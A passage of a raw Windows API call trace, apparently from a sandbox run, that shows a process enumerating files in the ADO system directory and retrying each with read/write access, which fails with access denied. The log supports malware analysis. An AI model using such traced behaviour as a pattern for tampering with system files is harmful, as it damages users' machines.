RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.164] AreFileApisANSI () returned 1 [0088.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", lpUsedDefaultChar=0x0) returned 54 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.164] AreFileApisANSI () returned 1 [0088.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76200 [0088.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned 54 [0088.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.308] GetFileType (hFile=0x368) returned 0x1 [0088.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0088.308] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.308] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.309] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.309] CloseHandle (hObject=0x368) returned 1 [0088.309] AreFileApisANSI () returned 1 [0088.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0088.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned 54 [0088.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.309] GetLastError () returned 0x5 [0088.309] GetLastError () returned 0x5 [0088.309] SetLastError (dwErrCode=0x5) [0088.309] GetLastError () returned 0x5 [0088.310] SetLastError (dwErrCode=0x5) [0088.310] GetLastError () returned 0x5 [0088.310] SetLastError (dwErrCode=0x5) [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.310] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xc5b43065, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x62e00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.311] AreFileApisANSI () returned 1 [0088.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", lpUsedDefaultChar=0x0) returned 52 [0088.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.311] AreFileApisANSI () returned 1 [0088.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0088.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46438, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 52 [0088.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.312] GetFileType (hFile=0x368) returned 0x1 [0088.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0088.312] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.312] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.312] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.312] CloseHandle (hObject=0x368) returned 1 [0088.313] AreFileApisANSI () returned 1 [0088.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0088.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 52 [0088.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.313] GetLastError () returned 0x5 [0088.313] GetLastError () returned 0x5 [0088.313] SetLastError (dwErrCode=0x5) [0088.313] GetLastError () returned 0x5 [0088.313] SetLastError (dwErrCode=0x5) [0088.313] GetLastError () returned 0x5 [0088.313] SetLastError (dwErrCode=0x5) [0088.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0088.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0088.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.313] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c5ad98, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c5ad98, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c5ad98, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0088.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.314] AreFileApisANSI () returned 1 [0088.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", lpUsedDefaultChar=0x0) returned 54 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.315] AreFileApisANSI () returned 1 [0088.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75b70 [0088.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 54 [0088.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.315] GetFileType (hFile=0x368) returned 0x1 [0088.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0088.315] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.315] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.315] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.316] CloseHandle (hObject=0x368) returned 1 [0088.316] AreFileApisANSI () returned 1 [0088.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0088.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 54 [0088.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.316] GetLastError () returned 0x5 [0088.316] GetLastError () returned 0x5 [0088.316] SetLastError (dwErrCode=0x5) [0088.316] GetLastError () returned 0x5 [0088.316] SetLastError (dwErrCode=0x5) [0088.316] GetLastError () returned 0x5 [0088.316] SetLastError (dwErrCode=0x5) [0088.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.316] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437960ad, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x437960ad, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x437960ad, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x16400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, 